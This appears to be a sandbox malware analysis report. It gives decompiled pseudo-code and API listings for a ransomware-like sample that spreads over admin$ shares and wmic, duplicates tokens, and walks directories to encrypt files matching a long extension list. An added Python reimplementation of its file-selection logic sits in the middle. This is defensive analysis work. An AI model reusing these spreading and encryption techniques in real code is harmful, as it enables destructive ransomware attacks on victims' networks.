    											goto L48;
    										} else {
    											__eflags = _a40 - _t191;
    											if(_a40 == _t191) {
    												L48:
    												_a24 = PathFileExistsW( &_a2768);
    												goto L50;
    											}
    											__eflags = _a40 & 0x00000003;
    											if((_a40 & 0x00000003) != 0) {
    												goto L48;
    											}
    											_a24 = _t206;
    											goto L50;
    										}
    									}
    								} else {
    									__eflags = _a8 - _t191;
    									if(_a8 == _t191) {
    										L52:
    										DeleteFileW( &_a4816);
    										break;
    									}
    									__eflags = _a12 - _t191;
    									if(__eflags == 0) {
    										goto L52;
    									}
    									E011E98AB( &_a1208,  &_a6864, __eflags, _a4, _a8, _a12);
    									_t206 = 1;
    									_t191 = 0;
    									__eflags = 0;
    									goto L26;
    								}
    							}
    							__eflags = _a32 - _t191;
    							if(_a32 != _t191) {
    								CloseHandle(_a32);
    								_a32 = _t191;
    							}
    							__eflags = _a36 - _t191;
    							if(_a36 != _t191) {
    								CloseHandle(_a36);
    							}
    							goto L57;
    						}
    						_t181 = GetLastError();
    						_a28 = _t181;
    						if(_t181 == 0x50 || _t181 == 0x35 || _t181 == 0x43 || _a44 != 0x4c3) {
    							goto L57;
    						} else {
    							if(_a20 != 0) {
    								goto L60;
    							}
    							_t188 = 1;
    							WNetCancelConnection2W( &_a168, 0, 1);
    							continue;
    						}
    					}
    				}
    			}

    0x011e998a
    0x011e9992
    0x011e9998
    0x011e999c
    0x011e99a0
    0x011e99a4
    0x011e99ab
    0x011e9d97
    0x00000000
    0x011e99b1
    0x011e99bc
    0x011e99d1
    0x011e99da
    0x011e99db
    0x011e99e9
    0x011e99f2
    0x011e9a01
    0x011e9a0c
    0x011e9a1c
    0x011e9a2a
    0x011e9a2c
    0x011e9a2f
    0x011e9a35
    0x011e9a48
    0x011e9a4c
    0x011e9a52
    0x011e9a6a
    0x011e9a6c
    0x011e9a77
    0x011e9a7f
    0x00000000
    0x00000000
    0x011e9a83
    0x011e9a8e
    0x011e9a96
    0x011e9b17
    0x011e9d7c
    0x011e9d7c
    0x011e9d81
    0x011e9d8f
    0x011e9d8f
    0x011e9d9f
    0x011e9d9f
    0x011e9da2
    0x011e9da4
    0x011e9daa
    0x011e9daa
    0x011e9db0
    0x011e9dc0
    0x011e9a98
    0x011e9a9e
    0x011e9a9e
    0x011e9aa2
    0x011e9aa2
    0x011e9ab8
    0x011e9abd
    0x011e9ac1
    0x011e9b24
    0x011e9b27
    0x011e9b29
    0x011e9b2c
    0x011e9b34
    0x011e9b39
    0x011e9b39
    0x011e9b2c
    0x011e9b4c
    0x011e9b50
    0x011e9b5b
    0x011e9b61
    0x011e9b63
    0x011e9b78
    0x011e9b78
    0x011e9b7e
    0x011e9b82
    0x011e9b82
    0x011e9b86
    0x00000000
    0x00000000
    0x011e9b8e
    0x011e9b96
    0x011e9b9e
    0x011e9ba6
    0x011e9ba7
    0x011e9baa
    0x011e9bb1
    0x011e9bb8
    0x011e9bbb
    0x011e9bbe
    0x011e9bc6
    0x011e9bca
    0x011e9bcf
    0x011e9bd3
    0x011e9be6
    0x011e9beb
    0x011e9beb
    0x011e9beb
    0x011e9bed
    0x011e9bf1
    0x011e9c26
    0x011e9c26
    0x011e9c2e
    0x011e9d2b
    0x011e9d31
    0x011e9d35
    0x011e9d35
    0x011e9d39
    0x011e9d3e
    0x00000000
    0x00000000
    0x011e9d44
    0x011e9d48
    0x00000000
    0x00000000
    0x00000000
    0x011e9d48
    0x011e9c34
    0x011e9c3c
    0x00000000
    0x00000000
    0x011e9c46
    0x011e9c4b
    0x011e9c4c
    0x011e9c4d
    0x011e9c4e
    0x011e9c53
    0x011e9c54
    0x011e9c5c
    0x011e9c5d
    0x011e9c65
    0x011e9c66
    0x011e9c6a
    0x011e9c78
    0x011e9c6c
    0x011e9c70
    0x011e9c70
    0x011e9c7e
    0x011e9c80
    0x00000000
    0x011e9c86
    0x011e9c8c
    0x011e9c9b
    0x011e9c9f
    0x011e9cab
    0x011e9caf
    0x011e9cb5
    0x011e9cb5
    0x011e9cb7
    0x011e9cbb
    0x011e9cc1
    0x011e9cc1
    0x011e9cc3
    0x011e9cc7
    0x011e9ccd
    0x011e9ccd
    0x011e9ccf
    0x011e9cd3
    0x011e9cd9
    0x011e9cd9
    0x011e9cdb
    0x011e9cdf
    0x011e9ce5
    0x011e9ce5
    0x011e9ce7
    0x011e9ceb
    0x011e9d00
    0x011e9d04
    0x00000000
    0x00000000
    0x011e9d08
    0x011e9d0c
    0x011e9d0f
    0x011e9d13
    0x011e9d15
    0x00000000
    0x00000000
    0x00000000
    0x011e9ced
    0x011e9ced
    0x011e9cf1
    0x011e9d17
    0x011e9d25
    0x00000000
    0x011e9d25
    0x011e9cf3
    0x011e9cf8
    0x00000000
    0x00000000
    0x011e9cfa
    0x00000000
    0x011e9cfa
    0x011e9ceb
    0x011e9bf3
    0x011e9bf3
    0x011e9bf6
    0x011e9d4a
    0x011e9d52
    0x00000000
    0x011e9d52
    0x011e9bfc
    0x011e9bff
    0x00000000
    0x00000000
    0x011e9c1c
    0x011e9c23
    0x011e9c24
    0x011e9c24
    0x00000000
    0x011e9c24
    0x011e9bf1
    0x011e9d58
    0x011e9d5c
    0x011e9d62
    0x011e9d68
    0x011e9d68
    0x011e9d6c
    0x011e9d70
    0x011e9d76
    0x011e9d76
    0x00000000
    0x011e9d70
    0x011e9ac3
    0x011e9ac9
    0x011e9ad0
    0x00000000
    0x011e9af6
    0x011e9afa
    0x00000000
    0x00000000
    0x011e9b00
    0x011e9b0c
    0x00000000
    0x011e9b0c
    0x011e9ad0
    0x011e9a2f

    APIs
    • wsprintfW.USER32 ref: 011E99D1
      • Part of subcall function 011E8B70: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E8B80
    • wsprintfW.USER32 ref: 011E9A2A
    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 011E9A4C
    • wsprintfW.USER32 ref: 011E9A6A
    • PathFindExtensionW.SHLWAPI(?), ref: 011E9A77
    • PathFileExistsW.SHLWAPI(?), ref: 011E9A8E
    • GetLastError.KERNEL32 ref: 011E9A98
      • Part of subcall function 011E8946: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 011E8963
      • Part of subcall function 011E8946: WriteFile.KERNEL32(00000000,01442A10,?,011E8A84,00000000), ref: 011E897A
      • Part of subcall function 011E8946: CloseHandle.KERNEL32(00000000), ref: 011E898B
    • GetLastError.KERNEL32(?,00000001), ref: 011E9AC3
    • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9B0C
    • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 011E9D8F
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000008,?,767C423D,00000000,?,?,?), ref: 011E6D1D
      • Part of subcall function 011E6CE7: HeapAlloc.KERNEL32(00000000), ref: 011E6D26
      • Part of subcall function 011E6CE7: memcpy.MSVCRT ref: 011E6D53
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 011E6D78
      • Part of subcall function 011E6CE7: HeapAlloc.KERNEL32(00000000), ref: 011E6D7B
      • Part of subcall function 011E6CE7: memcpy.MSVCRT ref: 011E6DAA
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000000,?,?), ref: 011E6DC7
      • Part of subcall function 011E6CE7: HeapFree.KERNEL32(00000000), ref: 011E6DCA
      • Part of subcall function 011E6CE7: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6DD1
      • Part of subcall function 011E6CE7: HeapFree.KERNEL32(00000000), ref: 011E6DD4
    • GetCurrentThread.KERNEL32(00000002,00000001,?,?,00000001), ref: 011E9B54
    • OpenThreadToken.ADVAPI32(00000000), ref: 011E9B5B
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 011E9B78
    • memset.MSVCRT ref: 011E9BB1
      • Part of subcall function 011E97A5: SetLastError.KERNEL32(00000003,?,00000001,767C423D,?,011E9BEB,?), ref: 011E9821
      • Part of subcall function 011E97A5: PathFileExistsW.SHLWAPI ref: 011E982C
      • Part of subcall function 011E97A5: wsprintfW.USER32 ref: 011E9846
      • Part of subcall function 011E97A5: wsprintfW.USER32 ref: 011E985A
      • Part of subcall function 011E97A5: memcpy.MSVCRT ref: 011E9889
    • DeleteFileW.KERNEL32(?), ref: 011E9D52
      • Part of subcall function 011E98AB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 011E98D8
      • Part of subcall function 011E98AB: PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 011E98EC
      • Part of subcall function 011E98AB: PathFileExistsW.SHLWAPI ref: 011E98F3
      • Part of subcall function 011E98AB: wsprintfW.USER32 ref: 011E9913
      • Part of subcall function 011E98AB: wsprintfW.USER32 ref: 011E9927
      • Part of subcall function 011E98AB: wsprintfW.USER32 ref: 011E9968
      • Part of subcall function 011E98AB: GetLastError.KERNEL32(?,00000104,?,00000001,00000000,?,011E9C21,?,?,?), ref: 011E9971
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C70
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E9C78
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 011E9C8C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 011E9C9F
    • CloseHandle.KERNEL32(?), ref: 011E9CB5
    • CloseHandle.KERNEL32(?), ref: 011E9CC1
    • CloseHandle.KERNEL32(?), ref: 011E9CCD
    • CloseHandle.KERNEL32(?), ref: 011E9CD9
    • CloseHandle.KERNEL32(?), ref: 011E9CE5
    • PathFileExistsW.SHLWAPI(?), ref: 011E9D1F
    • GetLastError.KERNEL32 ref: 011E9D2B
    • CloseHandle.KERNEL32(?), ref: 011E9D62
    • CloseHandle.KERNEL32(?), ref: 011E9D76
    • SetLastError.KERNEL32(00000057,00000000,?,?,?,011EA0C9,?,00000000,00000000,00000000), ref: 011E9DB0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 85%
    			E011E1038(void* _a4) {
    				char _v10;
    				char _v12;
    				char _v16;
    				void* _v20;
    				int _v24;
    				void* _v28;
    				long _v32;
    				void _v63;
    				void _v64;
    				void _v88;
    				void _v96;
    				char _v343;
    				void _v359;
    				void _v360;
    				void _v623;
    				char _v624;
    				int _t55;
    				void* _t63;
    				signed int _t64;
    				int _t67;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				void* _t74;
    				void* _t75;
    				signed int _t83;
    				signed int _t86;
    				intOrPtr _t92;
    				intOrPtr _t93;
    				int _t94;
    				void* _t96;
    				void _t97;
    				int _t103;
    				void* _t104;
    				void* _t105;
    				void* _t108;
    				void* _t109;
    				void* _t110;
    				void* _t113;
    				void* _t114;
    				void* _t115;
    
    				_v20 = 0;
    				_v624 = 0;
    				memset( &_v623, 0, 0x103);
    				_v360 = 0;
    				memset( &_v359, 0, 0x103);
    				_t86 = 6;
    				_v96 = 0;
    				_t55 = memset( &_v88, 0, _t86 << 2);
    				_push(7);
    				_v64 = 0;
    				memset( &_v63, _t55, 0 << 2);
    				_t113 = _t110 + 0x30;
    				asm("stosw");
    				_v16 = 0x5c2e5c5c;
    				_v12 = 0x3a30;
    				_v10 = 0;
    				_v32 = 0;
    				asm("stosb");
    				if(_a4 == 0) {
    					return 0xa0;
    				}
    				memset(_a4, 0, 0x104);
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				_t114 = _t113 + 0xc;
    				asm("movsb");
    				_v343 = 0;
    				if(GetSystemDirectoryA( &_v624, 0x104) != 0) {
    					_v12 = _v624;
    					_t23 =  &_v16; // 0x5c2e5c5c
    					_t63 = CreateFileA(_t23, 0, 3, 0, 3, 0, 0);
    					_v28 = _t63;
    					if(_t63 == 0xffffffff) {
    						goto L2;
    					}
    					_t67 = DeviceIoControl(_t63, 0x560000, 0, 0,  &_v96, 0x20,  &_v32, 0); // executed
    					if(_t67 != 0) {
    						_push(0xa);
    						_push( &_v64);
    						_push(_v88);
    						L011EA4DE();
    						_t69 =  &_v360;
    						_t115 = _t114 + 0xc;
    						_t96 = _t69 + 1;
    						do {
    							_t92 =  *_t69;
    							_t69 = _t69 + 1;
    						} while (_t92 != 0);
    						_t103 = _t69 - _t96;
    						_t71 =  &_v64;
    						_t108 = _t71 + 1;
    						do {
    							_t93 =  *_t71;
    							_t71 = _t71 + 1;
    						} while (_t93 != 0);
    						_t94 = _t71 - _t108;
    						_v24 = _t94;
    						if(_t94 + _t103 + 1 <= 0x104) {
    							if(_t103 <= 0) {
    								_t109 = _a4;
    								L20:
    								_t74 = _t109;
    								_t43 = _t74 + 1; // 0x3a31
    								_t104 = _t43;
    								do {
    									_t97 =  *_t74;
    									_t74 = _t74 + 1;
    								} while (_t97 != 0);
    								_t75 = _t74 - _t104;
    								if(_t94 > 0) {
    									_t105 = _t94 + _t75;
    									if(_t105 < 0x104) {
    										memcpy(_t75 + _t109,  &_v64, _v24);
    										 *((char*)(_t105 + _t109)) = 0;
    									}
    								}
    								L25:
    								CloseHandle(_v28);
    								return _v20;
    							}
    							if(_t103 > 0x103) {
    								_t103 = 0x103;
    							}
    							_t109 = _a4;
    							memcpy(_t109,  &_v360, _t103);
    							_t94 = _v24;
    							_t115 = _t115 + 0xc;
    							 *((char*)(_t109 + _t103)) = 0;
    							goto L20;
    						}
    						_v20 = 0x8007007a;
    						goto L25;
    					}
    					_t83 = GetLastError();
    					if(_t83 > 0) {
    						_t83 = _t83 & 0x0000ffff | 0x80070000;
    					}
    					_v20 = _t83;
    					goto L25;
    				}
    				L2:
    				_t64 = GetLastError();
    				if(_t64 > 0) {
    					return _t64 & 0x0000ffff | 0x80070000;
    				}
    				return _t64;
    			}

    APIs
    • memset.MSVCRT ref: 011E105D
    • memset.MSVCRT ref: 011E1071
    • memset.MSVCRT ref: 011E10B9
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 011E10E3
    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E10ED
    • CreateFileA.KERNEL32(\\.\0:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 011E111F
    • DeviceIoControl.KERNEL32(00000000,00560000,00000000,00000000,?,00000020,?,00000000), ref: 011E1140
    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E114A
    • _itoa.MSVCRT ref: 011E116F
    • memcpy.MSVCRT ref: 011E11CE
    • memcpy.MSVCRT ref: 011E1208
    • CloseHandle.KERNEL32(?), ref: 011E1216
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 94%
    			E011E1973(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v532;
    				short _v540;
    				short _v1044;
    				short _v1052;
    				short _v1572;
    				char _v1576;
    				short _v1580;
    				char _v1584;
    				struct _WIN32_FIND_DATAW _v2164;
    				void* _v2168;
    				signed int _v2172;
    				int _t40;
    				void* _t44;
    				intOrPtr* _t45;
    				int _t47;
    				intOrPtr* _t48;
    				WCHAR* _t53;
    				long _t66;
    				intOrPtr* _t70;
    				intOrPtr* _t71;
    				intOrPtr* _t72;
    				intOrPtr _t76;
    				intOrPtr _t77;
    				void* _t78;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				intOrPtr _t84;
    				signed int _t85;
    				void* _t87;
    
    				_t87 = (_t85 & 0xfffffff8) - 0x870;
    				if(_a8 == 0) {
    					L35:
    					return _t40;
    				}
    				_t40 = PathCombineW( &_v1044, _a4, "*");
    				if(_t40 == 0) {
    					goto L35;
    				}
    				_t40 = FindFirstFileW( &_v1052,  &_v2164); // executed
    				_v2168 = _t40;
    				if(_t40 != 0xffffffff) {
    					do {
    						_t83 = _a12;
    						_t44 =  *(_a12 + 0x1c);
    						if(_t44 == 0) {
    							L7:
    							_t70 = ".";
    							_t45 =  &(_v2164.cFileName);
    							while(1) {
    								_t76 =  *_t45;
    								if(_t76 !=  *_t70) {
    									break;
    								}
    								if(_t76 == 0) {
    									L12:
    									_t45 = 0;
    									L14:
    									if(_t45 == 0) {
    										goto L33;
    									} else {
    										_t71 = L"..";
    										_t48 =  &(_v2164.cFileName);
    										while(1) {
    											_t77 =  *_t48;
    											if(_t77 !=  *_t71) {
    												break;
    											}
    											if(_t77 == 0) {
    												L20:
    												_t48 = 0;
    												L22:
    												if(_t48 != 0 && PathCombineW( &_v1572, _a4,  &(_v2164.cFileName)) != 0) {
    													if((_v2172 & 0x00000010) == 0 || (_v2172 & 0x00000400) != 0) {
    														_t53 = PathFindExtensionW( &(_v2164.dwReserved0));
    														_t72 =  &(_v2164.dwReserved0);
    														_t78 = _t72 + 2;
    														do {
    															_t84 =  *_t72;
    															_t72 = _t72 + 2;
    														} while (_t84 != 0);
    														if(_t53 != _t87 + 0x3c + (_t72 - _t78 >> 1) * 2) {
    															wsprintfW( &_v540, L"%ws.", _t53);
    															_t87 = _t87 + 0xc;
    															if(StrStrIW(L".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.",  &_v532) != 0) {
    																E011E189A( &_v1576, _a12); // executed
    															}
    														}
    													} else {
    														if(StrStrIW(L"C:\\Windows;",  &_v1580) == 0) {
    															E011E1973( &_v1584, _a8 - 1, _t83); // executed
    														}
    													}
    												}
    												goto L33;
    											}
    											_t79 =  *((intOrPtr*)(_t48 + 2));
    											_t14 = _t71 + 2; // 0x2e
    											if(_t79 !=  *_t14) {
    												break;
    											}
    											_t48 = _t48 + 4;
    											_t71 = _t71 + 4;
    											if(_t79 != 0) {
    												continue;
    											}
    											goto L20;
    										}
    										asm("sbb eax, eax");
    										asm("sbb eax, 0xffffffff");
    										goto L22;
    									}
    								}
    								_t80 =  *((intOrPtr*)(_t45 + 2));
    								_t11 = _t70 + 2; // 0x2e0000
    								if(_t80 !=  *_t11) {
    									break;
    								}
    								_t45 = _t45 + 4;
    								_t70 = _t70 + 4;
    								if(_t80 != 0) {
    									continue;
    								}
    								goto L12;
    							}
    							asm("sbb eax, eax");
    							asm("sbb eax, 0xffffffff");
    							goto L14;
    						}
    						_t66 = WaitForSingleObject(_t44, 0);
    						if(_t66 == 0 || _t66 == 0xffffffff) {
    							break;
    						} else {
    							goto L7;
    						}
    						L33:
    						_t47 = FindNextFileW(_v2168,  &_v2164); // executed
    					} while (_t47 != 0);
    					_t40 = FindClose(_v2168);
    				}
    			}
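The selection rules of E011E1973, reimplemented as an added Python example (not code from the report or from the sample) and run over a constructed directory tree. The extension list is the one in the StrStrIW call above; the start depth of 15 is the 0xf that E011E1E51 passes; the root path C:\ is an assumption, because the path string lives in the caller's context structure, which the report does not show. Two details from the listing are worth checking by hand: the extension is wrapped in dots before the case-insensitive substring search, which makes the match exact, and the C:\Windows test passes the literal as the haystack and the candidate path as the needle, so it only fires for the path C:\Windows itself. The abort event waited on at offset 0x1c of the context is not modelled.

```python
# Attribute bits tested in E011E1973 and the extension list from its StrStrIW call, copied verbatim
# from the listing above (the report's APIs/Strings sections show it truncated).
FILE_ATTRIBUTE_DIRECTORY = 0x10
FILE_ATTRIBUTE_ARCHIVE = 0x20
FILE_ATTRIBUTE_REPARSE_POINT = 0x400
TARGET_EXTENSIONS = (".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu"
                     ".doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php"
                     ".pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk"
                     ".vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.")
SKIP_HAYSTACK = "C:\\Windows;"   # first argument of the StrStrIW call
START_DEPTH = 15                 # the 0xf passed by E011E1E51

def path_find_extension(name):
    """PathFindExtensionW: the '.'-suffix of the last path component, '' when there is none
    (the listing detects that case by comparing the returned pointer with the end of the string)."""
    base = name.rsplit("\\", 1)[-1]
    dot = base.rfind(".")
    return base[dot:] if dot >= 0 else ""

def has_target_extension(name):
    """wsprintfW(L"%ws.", ext) followed by StrStrIW(list, that): the dot on both sides makes the match
    exact, so ".doc." does not match ".docx" and ".c." only matches the C-source entry."""
    ext = path_find_extension(name)
    return bool(ext) and (ext + ".").lower() in TARGET_EXTENSIONS.lower()

def is_skipped_directory(full_path):
    """StrStrIW(L"C:\\Windows;", path) searches the literal for the path, not the other way round, so
    only a path that is itself a substring of "C:\\Windows;" matches; in a scan of C:\\ that is C:\\Windows."""
    return full_path.lower() in SKIP_HAYSTACK.lower()

def scan_tree(children, path, depth=START_DEPTH, out=None):
    """Same decisions as the FindFirstFileW/FindNextFileW loop: depth counts down with each recursion and
    a call at depth 0 lists nothing; '.' and '..' are skipped; a directory that is not a reparse point is
    recursed into unless skipped; anything else (files, and junctions/symlinks) goes to the extension test.
    Returns the full paths that would be handed to the encryption routine E011E189A."""
    out = [] if out is None else out
    if depth == 0:
        return out
    for name, (attrs, subtree) in children.items():
        if name in (".", ".."):
            continue
        full = path.rstrip("\\") + "\\" + name            # PathCombineW(parent, cFileName)
        if attrs & FILE_ATTRIBUTE_DIRECTORY and not attrs & FILE_ATTRIBUTE_REPARSE_POINT:
            if not is_skipped_directory(full):
                scan_tree(subtree or {}, full, depth - 1, out)
        elif has_target_extension(name):
            out.append(full)
    return out

# Constructed directory tree (not from the sandbox run): each entry is name -> (attributes, children).
# A chain d1..d15 shows the depth limit: deep.doc sits in d14, deeper.doc in d15.
_node = {"deeper.doc": (FILE_ATTRIBUTE_ARCHIVE, None)}
for _level in range(15, 0, -1):
    _node = {"d%d" % _level: (FILE_ATTRIBUTE_DIRECTORY, _node)}
    if _level == 15:
        _node["deep.doc"] = (FILE_ATTRIBUTE_ARCHIVE, None)
SAMPLE_TREE = {
    ".": (FILE_ATTRIBUTE_DIRECTORY, None),
    "..": (FILE_ATTRIBUTE_DIRECTORY, None),
    "Windows": (FILE_ATTRIBUTE_DIRECTORY, {"Temp": (FILE_ATTRIBUTE_DIRECTORY,
                {"cache.doc": (FILE_ATTRIBUTE_ARCHIVE, None)})}),
    "Users": (FILE_ATTRIBUTE_DIRECTORY, {"alice": (FILE_ATTRIBUTE_DIRECTORY, {
        "Documents": (FILE_ATTRIBUTE_DIRECTORY, {
            "report.docx": (FILE_ATTRIBUTE_ARCHIVE, None),
            "archive.tar.gz": (FILE_ATTRIBUTE_ARCHIVE, None),
            "notes.txt": (FILE_ATTRIBUTE_ARCHIVE, None),
            ".bashrc": (FILE_ATTRIBUTE_ARCHIVE, None)}),
        # a junction: directory bit plus reparse bit, so it is treated like a file and not descended into
        "Link": (FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_REPARSE_POINT,
                 {"inside.pdf": (FILE_ATTRIBUTE_ARCHIVE, None)})})}),
    "Program Files": (FILE_ATTRIBUTE_DIRECTORY, {"app": (FILE_ATTRIBUTE_DIRECTORY,
                      {"main.py": (FILE_ATTRIBUTE_ARCHIVE, None)})}),
    "README": (FILE_ATTRIBUTE_ARCHIVE, None),
}
SAMPLE_TREE.update(_node)
```

Calling scan_tree(SAMPLE_TREE, "C:\\") returns four paths: the .docx, the .gz, the .py and deep.doc; C:\Windows is never entered, the junction is not followed, and deeper.doc is out of reach because the sixteenth level is visited at depth 0.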

    APIs
    • PathCombineW.SHLWAPI(?,?,011F0A6C), ref: 011E199B
    • FindFirstFileW.KERNELBASE(?,?), ref: 011E19B6
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 011E19DC
    • PathCombineW.SHLWAPI(?,?,?), ref: 011E1A7B
    • StrStrIW.SHLWAPI(C:\Windows;,?), ref: 011E1AA7
    • PathFindExtensionW.SHLWAPI(?), ref: 011E1AC7
    • wsprintfW.USER32 ref: 011E1AF9
    • StrStrIW.SHLWAPI(.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or,?), ref: 011E1B0F
      • Part of subcall function 011E189A: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 011E18B3
      • Part of subcall function 011E189A: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011E1B25,?,?), ref: 011E18CC
      • Part of subcall function 011E189A: CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,?,00000000,?,?,?,?,011E1B25,?), ref: 011E18F2
      • Part of subcall function 011E189A: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,?,?,?,?,?,011E1B25,?), ref: 011E1907
      • Part of subcall function 011E189A: CryptEncrypt.ADVAPI32(FFFFFFFE,00000000,00000001,00000000,00000000,?,?,?,?,?,?,011E1B25,?), ref: 011E1924
      • Part of subcall function 011E189A: FlushViewOfFile.KERNEL32(00000000,?,?,?,?,?,011E1B25,?), ref: 011E1932
      • Part of subcall function 011E189A: UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,011E1B25,?), ref: 011E1939
      • Part of subcall function 011E189A: CloseHandle.KERNEL32(?), ref: 011E1942
      • Part of subcall function 011E189A: CloseHandle.KERNEL32(011E1B25), ref: 011E194B
    • FindNextFileW.KERNELBASE(?,?), ref: 011E1B2E
    • FindClose.KERNEL32(?), ref: 011E1B40
    Strings
    • .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.or, xrefs: 011E1B0A
    • %ws., xrefs: 011E1AF3
    • C:\Windows;, xrefs: 011E1AA2
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1983
    • =B|v, xrefs: 011E1AF9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 92%
    			E011E73FD(WCHAR* _a4) {
    				void* _v8;
    				long _v12;
    				long _v16;
    				struct _SECURITY_ATTRIBUTES _v28;
    				struct _SECURITY_DESCRIPTOR* _t25;
    				void* _t30;
    				int _t31;
    				int _t34;
    				WCHAR* _t44;
    				void* _t50;
    				void* _t51;
    
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_v28.nLength = 0xc;
    				_v28.bInheritHandle = 0;
    				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
    				_v28.lpSecurityDescriptor = _t25;
    				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					while(1) {
    						L3:
    						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
    						_v8 = _t30;
    						if(_t30 == 0xffffffff) {
    							continue;
    						}
    						L4:
    						_t31 = ConnectNamedPipe(_t30, 0); // executed
    						if(_t31 == 0) {
    							L18:
    							CloseHandle(_v8);
    							do {
    								goto L3;
    							} while (_t30 == 0xffffffff);
    							goto L4;
    						} else {
    							_t50 = 0x1e;
    							do {
    								_t50 = _t50 - 1;
    								_v12 = 0;
    								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
    								if(_t34 == 0) {
    									goto L9;
    								}
    								if(_v12 != 0) {
    									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
    									if(_t51 != 0) {
    										_v16 = 0;
    										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
    											_t44 = StrChrW(_t51, 0x3a);
    											if(_t44 != 0) {
    												 *_t44 = 0;
    												E011E6DE0(_t51,  &(_t44[1]), 2);
    											}
    										}
    										HeapFree(GetProcessHeap(), 0, _t51);
    									}
    									L17:
    									FlushFileBuffers(_v8);
    									DisconnectNamedPipe(_v8);
    									goto L18;
    								}
